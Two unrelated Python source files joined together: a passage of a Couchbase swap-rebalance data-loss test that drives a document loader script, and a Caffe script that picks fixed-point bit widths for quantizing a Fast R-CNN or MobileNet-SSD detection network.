self.kv_node_out = self.input.param("kv_node_out")
self.index_node_out = self.input.param("index_node_out")
self.num_docs = self.input.param("num_docs", 30000)
# self.run_operation(phase="before")
create_index_queries = ["CREATE INDEX idx_body ON default(body) USING GSI",
"CREATE INDEX idx_update ON default(`update`) USING GSI",
"CREATE INDEX idx_val ON default(val) USING GSI",
"CREATE INDEX idx_body1 ON default(body) USING GSI",
"CREATE INDEX idx_update1 ON default(`update`) USING GSI",
"CREATE INDEX idx_val1 ON default(val) USING GSI"]
for create_index_query in create_index_queries:
self._create_replica_index(create_index_query)
load_thread = threading.Thread(target=self.load_buckets_with_high_ops,
name="gen_high_ops_load",
args=(self.master, self.buckets[0], self.num_docs,
self.batch_size,
self.threads, 0,
self.instances, 0))
load_thread.start()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["kv"]
# do a swap rebalance of kv
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]],
[self.servers[self.kv_node_out]], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
load_thread.join()
errors = self.check_dataloss_for_high_ops_loader(self.master, self.buckets[0],
self.num_docs,
self.batch_size,
self.threads,
0,
False, 0, 0,
False, 0)
if errors:
self.log.info("Printing missing keys:")
for error in errors:
print(error)
if self.num_docs + self.docs_per_day != self.rest.get_active_key_count(self.buckets[0]):
self.fail("FATAL: Data loss detected!! Docs loaded : {0}, docs present: {1}".
format(self.num_docs + self.docs_per_day, self.rest.get_active_key_count(self.buckets[0])))
load_thread1 = threading.Thread(target=self.load_buckets_with_high_ops,
name="gen_high_ops_load",
args=(self.master, self.buckets[0], self.num_docs * 2,
self.batch_size,
self.threads, 0,
self.instances, 0))
load_thread1.start()
# do a swap rebalance of index
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [self.servers[self.nodes_init+1]]
, [self.servers[self.index_node_out]], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
load_thread1.join()
errors = self.check_dataloss_for_high_ops_loader(self.master, self.buckets[0],
self.num_docs * 2,
self.batch_size,
self.threads,
0,
False, 0, 0,
False, 0)
if errors:
self.log.info("Printing missing keys:")
for error in errors:
print(error)
if self.num_docs * 2 + self.docs_per_day != self.rest.get_active_key_count(self.buckets[0]):
self.fail("FATAL: Data loss detected!! Docs loaded : {0}, docs present: {1}".
format(self.num_docs * 2 + self.docs_per_day, self.rest.get_active_key_count(self.buckets[0])))
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init + 1]],
[self.servers[self.index_node_out]], swap_rebalance=True)
def load_buckets_with_high_ops(self, server, bucket, items, batch=20000,
threads=5, start_document=0, instances=1, ttl=0):
import subprocess
cmd_format = "python3 scripts/high_ops_doc_gen.py --node {0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {9} --ttl {10}"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 0 and self.use_replica_to:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
items, batch, threads, start_document,
cb_version, instances, ttl)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
        # decode the loader output so it can be parsed as text (Popen pipes return bytes)
        output = result.stdout.read().decode('utf-8')
        error = result.stderr.read().decode('utf-8')
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, items,
"Failed to load {} items. Loaded only {} items".format(
items,
total_loaded))
def check_dataloss_for_high_ops_loader(self, server, bucket, items,
batch=20000, threads=5,
start_document=0,
updated=False, ops=0, ttl=0, deleted=False, deleted_items=0):
import subprocess
from lib.memcached.helper.data_helper import VBucketAwareMemcached
cmd_format = "python3 scripts/high_ops_doc_gen.py --node {0} --bucket {1} --user {2} --password {3} " \
"--count {4} " \
"--batch_size {5} --threads {6} --start_document {7} --cb_version {8} --validate"
cb_version = RestConnection(server).get_nodes_version()[:3]
if updated:
cmd_format = "{} --updated --ops {}".format(cmd_format, ops)
if deleted:
cmd_format = "{} --deleted --deleted_items {}".format(cmd_format, deleted_items)
if ttl > 0:
cmd_format = "{} --ttl {}".format(cmd_format, ttl)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
int(items), batch, threads, start_document, cb_version)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
        # decode the validator output so it can be parsed as text (Popen pipes return bytes)
        output = result.stdout.read().decode('utf-8')
        error = result.stderr.read().decode('utf-8')
errors = []
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
if error:
self.log.error(error)
self.fail("Failed to run the loadgen validator.")
if output:
loaded = output.split('\n')[:-1]
for load in loaded:
if "Missing keys:" in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append(
("Missing key: {0}, VBucketId: {1}".format(key, vBucketId)))
if "Mismatch keys: " in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append((
"Wrong value for key: {0}, VBucketId: {1}".format(
key, vBucketId)))
return errors
|
quantize_mobilenet-ssd3_test.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from subprocess import check_output
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
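# In-place blobs (layers whose top name equals a bottom name) are renamed with a '/t'
# suffix so that every quantized layer ends up with a uniquely named output blob; the
# per-layer input/output analysis later in this script relies on top != bottom.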
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
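# Throughout this script the dynamic-fixed-point fractional length (fl_*) is derived
# as bit width minus integer length. For example (illustrative): bw_params=8 with an
# integer length of 3 leaves fl_params=5 fractional bits.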
def change_layer_BAC_bw(net_proto, layer_name,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.bw_add = bw_add
l.quantization_param.fl_add = fl_add
l.quantization_param.bw_multiply = bw_multiply
            l.quantization_param.fl_multiply = fl_multiply
return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
percentile = 0
layer_param = net.params[layer.name]
#max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
weight_sorted = np.sort(layer_param[0].data[...], axis=None)
max_weight = max(weight_sorted[int(len(weight_sorted)*percentile)], weight_sorted[-1*int(len(weight_sorted)*percentile)-1],key=abs)
if layer.convolution_param.bias_term:
bias_sorted = np.sort(layer_param[1].data[...], axis=None)
max_bias = max(bias_sorted[int(len(bias_sorted)*percentile)], bias_sorted[-1*int(len(bias_sorted)*percentile)-1],key=abs)
#max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
else:
max_bias = 0
#print layer.name, max_weight, max(weight_sorted[0],weight_sorted[-1],key=abs), max(weight_sorted[int(len(weight_sorted)/100)], weight_sorted[-1*int(len(weight_sorted)/100)],key=abs)
max_param = max(max_weight, max_bias, key=abs)
return math.ceil(math.log(abs(max_param), 2)) + 1
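# Illustrative example of the integer-length estimate above: a maximum absolute
# parameter of 5.3 gives ceil(log2(5.3)) + 1 = 3 + 1 = 4 integer bits (the +1 covers
# the sign bit in dynamic fixed point).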
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def analyze_net_output_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
#print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
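# Note: calc_layer_adder_IL/calc_layer_multiplier_IL read the first four elements of a
# layer's flattened top blob; this appears to be a convention of the modified
# ConvolutionIVS/FcIVS layers when analyze_mode is enabled, which store the adder and
# multiplier extrema there.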
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
net_adder_IL[layer.name] = -sys.maxint - 1
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward(start=layer.name, end=layer.name)
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
    input_bw = output_bw
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
    fn = ori_net_path
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
with open(outf, 'w') as f:
f.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
print dir(layer)
print layer.reshape
print layer.convolution_param
print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
#cfg.GPU_ID = GPU_ID
#caffe.set_device(GPU_ID)
#caffe.set_mode_gpu()
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
ap = float(check_output('./caffe-fast-rcnn/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True))
#ap = test_qnet(net_path, args.caffemodel, imdb)
#ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
args = parse_args()
num_iters = 4952
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
print 'Create quantized prototxt'
print 'Testing Full Precision Accuracy'
manager = multiprocessing.Manager()
shared_dict = manager.dict()
GPU1 = 1
GPU2 = 1
#p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
timer = Timer()
timer.tic()
#p.start()
#p.join()
timer.toc()
print ('Took {:.3f}s').format(timer.total_time)
#full_ap = shared_dict['FP-FP-FP-FP-FP']
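    # The full-precision evaluation above is commented out; a previously obtained
    # mAP value is hard-coded below instead.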
full_ap = 0.725401
print 'Full precision accuracy : {}'.format(full_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 8 #just initial
bw_deconv = 0 #just initial
bw_fc = 0 #just initial
bw_output = 8 #just initial
bw_adder = 12 #just initial
bw_multiplier = 10 #just initial
convIL_reduction = 0
